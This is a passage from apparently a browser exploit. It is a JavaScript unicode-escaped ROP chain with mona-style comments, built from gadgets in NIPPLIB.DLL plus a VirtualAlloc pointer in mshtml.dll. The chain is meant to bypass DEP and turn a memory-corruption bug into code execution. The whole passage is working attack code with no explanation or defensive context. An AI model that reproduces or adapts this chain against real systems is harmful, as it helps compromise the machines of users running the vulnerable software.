    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%ud5c2%u5c0b" + // 0x5c0bd5c2 : ,# INC ECX # RETN [NIPPLIB.DLL] 
    "%u681e%u5c07" + // 0x5c07681e : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u5142%u5c07" + // 0x5c075142 : ,# RETN (ROP NOP) [NIPPLIB.DLL]
    "%uacc7%u5c07" + // 0x5c07acc7 : ,# POP ESI # RETN [NIPPLIB.DLL] 
    "%ubbc0%u5c01" + // 0x5c01bbc0 : ,# JMP [EAX] [NIPPLIB.DLL]
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%u1314%u6358" + // 0x63581314 : ,# ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT mshtml.dll]
    "%u39e1%u5c08" + // 0x5c0839e1 : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    "%u1ba0%u5c07" + // 0x5c071ba0 : ,# ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ""); //  : 


--------------------------------------------------------------------------------------------------

